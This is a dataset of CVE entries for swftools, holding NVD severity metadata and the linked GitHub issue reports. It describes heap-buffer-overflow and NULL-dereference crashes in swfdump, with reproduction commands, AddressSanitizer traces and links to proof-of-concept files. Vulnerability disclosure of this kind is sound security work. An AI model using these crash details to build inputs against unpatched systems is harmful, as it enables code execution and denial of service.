2021-09-20T16:15:13.567
An issue was discovered in swftools through 20200710. A NULL pointer dereference exists in the function swf_DumpActions() located in swfaction.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/115" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/115" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/matthiaskramm/swftools/issues/115
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## Output ``` Segmentation fault (core dumped) ``` ## AddressSanitizer output ``` ASAN:SIGSEGV ================================================================= ==15645==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fed57f575c7 bp 0x7ffcbf871410 sp 0x7ffcbf870e98 T0) #0 0x7fed57f575c6 (/lib/x86_64-linux-gnu/libc.so.6+0x18e5c6) #1 0x7fed57e264d2 in vfprintf (/lib/x86_64-linux-gnu/libc.so.6+0x5d4d2) #2 0x7fed57efb2eb in __printf_chk (/lib/x86_64-linux-gnu/libc.so.6+0x1322eb) #3 0x55e63636c9fb in printf /usr/include/x86_64-linux-gnu/bits/stdio2.h:104 #4 0x55e63636c9fb in swf_DumpActions modules/swfaction.c:483 #5 0x55e6363586bd in main /home/seviezhou/swftools/src/swfdump.c:1585 #6 0x7fed57deab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x55e63635c439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ??:0 ?? ==15645==ABORTING ``` ## POC [SEGV-swf_DumpActions-swfaction-483.zip](https://github.com/matthiaskramm/swftools/files/5026666/SEGV-swf_DumpActions-swfaction-483.zip)
A Segmentation fault in swfaction.c:483
https://api.github.com/repos/swftools/swftools/issues/115/comments
0
2020-08-05T07:02:23Z
2020-08-05T07:09:34Z
https://github.com/swftools/swftools/issues/115
673,305,336
115
2,573
CVE-2021-39564
2021-09-20T16:15:13.607
An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function swf_DumpActions() located in swfaction.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/116" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/116
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## AddressSanitizer output ``` ================================================================= ==11451==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000dfbd at pc 0x5641d3a2a305 bp 0x7ffe12b4fe00 sp 0x7ffe12b4fdf0 READ of size 1 at 0x60400000dfbd thread T0 #0 0x5641d3a2a304 in swf_DumpActions modules/swfaction.c:398 #1 0x5641d3a156bd in main /home/seviezhou/swftools/src/swfdump.c:1585 #2 0x7fc31ff26b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #3 0x5641d3a19439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) 0x60400000dfbd is located 1 bytes to the right of 44-byte region [0x60400000df90,0x60400000dfbc) allocated by thread T0 here: #0 0x7fc3205ab612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x5641d3b54ca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #2 0x7ffe12b5248f (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow modules/swfaction.c:398 swf_DumpActions Shadow bytes around the buggy address: 0x0c087fff9ba0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00 0x0c087fff9bb0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff9bc0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff9bd0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff9be0: fa fa 00 00 00 00 00 02 fa fa 00 00 00 00 00 00 =>0x0c087fff9bf0: fa fa 00 00 00 00 00[04]fa fa 00 00 00 00 00 00 0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11451==ABORTING ``` ## POC [heap-overflow-swf_DumpActions-swfaction-398.zip](https://github.com/matthiaskramm/swftools/files/5026685/heap-overflow-swf_DumpActions-swfaction-398.zip)
A heap-buffer-overflow in swfaction.c:398
https://api.github.com/repos/swftools/swftools/issues/116/comments
0
2020-08-05T07:06:56Z
2020-08-05T07:09:11Z
https://github.com/swftools/swftools/issues/116
673,307,783
116
2,574
CVE-2021-39569
2021-09-20T16:15:13.650
An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function OpAdvance() located in swfaction.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/114" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/114
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## AddressSanitizer output ``` ================================================================= ==20124==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efb4 at pc 0x7f2d4f82d1fb bp 0x7ffce65015f0 sp 0x7ffce6500d98 READ of size 4 at 0x60200000efb4 thread T0 #0 0x7f2d4f82d1fa in strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x701fa) #1 0x55fbc64ea928 in OpAdvance modules/swfaction.c:254 #2 0x55fbc64eb521 in swf_DumpActions modules/swfaction.c:490 #3 0x55fbc64da6bd in main /home/seviezhou/swftools/src/swfdump.c:1585 #4 0x7f2d4f1d0b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55fbc64de439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) 0x60200000efb4 is located 0 bytes to the right of 4-byte region [0x60200000efb0,0x60200000efb4) allocated by thread T0 here: #0 0x7f2d4f855612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x55fbc6619ca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #2 0x7ffce6503c8f (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strlen Shadow bytes around the buggy address: 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9de0: fa fa fa fa fa fa 00 05 fa fa 05 fa fa fa 00 00 =>0x0c047fff9df0: fa fa 00 fa fa fa[04]fa fa fa 02 fa fa fa 01 fa 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==20124==ABORTING ``` ## POC [heap-overflow-OpAdvance-swfaction-254.zip](https://github.com/matthiaskramm/swftools/files/5026647/heap-overflow-OpAdvance-swfaction-254.zip)
A heap-buffer-overflow in swfaction.c:254
https://api.github.com/repos/swftools/swftools/issues/114/comments
0
2020-08-05T06:59:30Z
2020-08-05T07:09:59Z
https://github.com/swftools/swftools/issues/114
673,303,749
114
2,575
CVE-2021-39574
2021-09-20T16:15:13.693
An issue was discovered in swftools through 20200710. A heap-buffer-overflow exists in the function pool_read() located in pool.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/124" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/124" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:*:*:*:*:*:*:*:*", "matchCriteriaId": "192BB2B1-5CB5-4E87-AAB7-51ACC07D8934", "versionEndExcluding": null, "versionEndIncluding": "2020-07-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/matthiaskramm/swftools/issues/124
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
## System info Ubuntu x86_64, clang 6.0, swfdump (latest master [fad6c2](https://github.com/matthiaskramm/swftools/commit/fad6c2e7505efa62e68375d061a508f802c3e77c)) ## Command line ./src/swfdump -D @@ ## AddressSanitizer output ``` /home/seviezhou/swftools/lib/rfxswf.c:520 #1 0x55e4357ac829 in pool_read as3/pool.c:1119 #2 0x55e435798f44 in swf_ReadABC as3/abc.c:748 #3 0x55e43570e003 in main /home/seviezhou/swftools/src/swfdump.c:1577 #4 0x7f3431472b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55e435711439 in _start (/home/seviezhou/swftools/src/swfdump+0xd0439) 0x60400000df7b is located 0 bytes to the right of 43-byte region [0x60400000df50,0x60400000df7b) allocated by thread T0 here: #0 0x7f3431af7612 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98612) #1 0x55e43584cca7 in rfx_alloc /home/seviezhou/swftools/lib/mem.c:30 #2 0x55e43585b096 (/home/seviezhou/swftools/src/swfdump+0x21a096) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/swftools/lib/rfxswf.c:520 swf_GetD64 Shadow bytes around the buggy address: 0x0c087fff9b90: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff9ba0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff9bb0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff9bc0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff9bd0: fa fa 00 00 00 00 00 05 fa fa 00 00 00 00 05 fa =>0x0c087fff9be0: fa fa 00 00 00 00 00 07 fa fa 00 00 00 00 00[03] 0x0c087fff9bf0: fa fa 00 00 00 00 03 fa fa fa 00 00 00 00 05 fa 0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==29380==ABORTING ``` ## POC [heap-overflow-swf_GetD64-rfxswf-520.zip](https://github.com/matthiaskramm/swftools/files/5026849/heap-overflow-swf_GetD64-rfxswf-520.zip)
A heap-buffer-overflow in rfxswf.c:520
https://api.github.com/repos/swftools/swftools/issues/124/comments
0
2020-08-05T07:40:08Z
2020-08-05T07:40:08Z
https://github.com/swftools/swftools/issues/124
673,326,905
124
2,576